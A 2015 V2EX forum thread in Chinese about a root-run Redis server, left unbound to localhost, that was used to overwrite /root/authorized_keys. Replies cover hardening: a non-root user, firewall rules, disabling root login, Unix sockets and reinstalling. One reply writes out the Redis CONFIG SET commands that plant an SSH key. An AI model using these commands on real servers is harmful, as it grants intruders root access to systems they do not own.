redis 没有 bind 127.0.0.1 差点出大事!!!

2015-11-08 08:18:46 +08:00
 void1900

使用 config 可以随意修改文件,比如 /root/authorized_keys

.. 吓死宝宝了

21611 次点击
所在节点    Redis
27 条回复
Zzzzzzzzz
2015-11-08 08:31:50 +08:00
没 bind 127.0.0.1 只是问题之一

iptables 没对固定的几个端口开放白名单问题之二

问题之三是 redis 有权改 /root/下的文件说明是以 root 跑的 redis, 这是最大的问题
void1900
2015-11-08 08:47:21 +08:00
@Zzzzzzzzz iptable 不知道谁关了,以前是靠 iptable 限制只本地的,就忽略了 bind 参数,还好收到 aliyun 异地登陆通知! redis 怎么用其他用户跑? `su xxx` 再启动?
raingolee
2015-11-08 08:47:32 +08:00
用 root 起了 redis?
void1900
2015-11-08 08:48:07 +08:00
@raingolee 对的,怎么用其他用户跑?
msg7086
2015-11-08 08:50:05 +08:00
你 redis 怎么从 redis 账号提权修改 root 文件的……
void1900
2015-11-08 08:56:20 +08:00
@msg7086 root 用户启动的 redis 。。。
msg7086
2015-11-08 09:01:15 +08:00
@void1900 随便抓个发行版( Ubuntu Debian Arch )里带的 redis 都是用 redis 用户启动的。
真没见过哪个会用 root 启动 redis ……

PS: 善意提醒,一旦 root 用户被人登录过,请老老实实重装系统以及重新排查程序里可能被植入的木马。
binux
2015-11-08 09:02:24 +08:00
config set dir /root/.ssh/
config set dbfilename authorized_keys
set xxxx "\n\n\nssh-rsa zzzzzzzzzzzzzzzzzzzz\n\n\n"
save

并不能登录, authorized_keys 的权限不是 600
ETiV
2015-11-08 09:05:39 +08:00
能想到这么搞的人脑洞真是大啊……
void1900
2015-11-08 09:05:53 +08:00
@binux 为什么我的可以。。。 略微奇怪,我配服务器的时候因为自己的 key 都登陆不了,执行过 `restorecon -r /root/.ssh/`
void1900
2015-11-08 09:07:51 +08:00
@msg7086 谢谢,不过目前还没这考虑,因为东西比较多,不过有做异地备份,而且是半夜几点,多台服务器,而且没有把利用的漏洞关上,感觉是批量跑的。
lightening
2015-11-08 09:11:20 +08:00
所以要把 Redis 装在 Docker 里……
raingolee
2015-11-08 09:15:58 +08:00
@msg7086 手动编译的 redis ,好像就没有自带 redis 用户哦
raingolee
2015-11-08 09:18:25 +08:00
@void1900
恩切用户再启动就行
---
为什么我的 /root/.ssh/authorized_keys 权限 644 也可以 key 登陆,确实有点奇怪,配服务器的时候因为自己的 key 也无法登陆执行过 restorecon -r ~/.ssh/

这个你确认是 644 然后用 root key 登陆的嘛
void1900
2015-11-08 09:19:58 +08:00
@raingolee 确定 shh root@xxx.xx.xx.xx 不需要输入密码就登陆了。
void1900
2015-11-08 09:19:58 +08:00
@raingolee 确定 shh root@xxx.xx.xx.xx 不需要输入密码就登陆了。
msg7086
2015-11-08 09:21:13 +08:00
@raingolee 手动编译的话当然安装也要自己配置了。
你写 systemd 启动配置脚本的时候得加上 user/group 才行。
void1900
2015-11-08 09:21:17 +08:00
@raingolee
-rw-r--r--. 1 root root 123 11 月 7 19:16 authorized_keys
kaneg
2015-11-08 09:39:04 +08:00
应该禁用 root 直接登录,用 sudo
yytsjq
2015-11-08 10:29:16 +08:00
本机使用的话, Redis 使用 UNIX sock 连接方式呢?是不是更安全些。。

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/234520

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX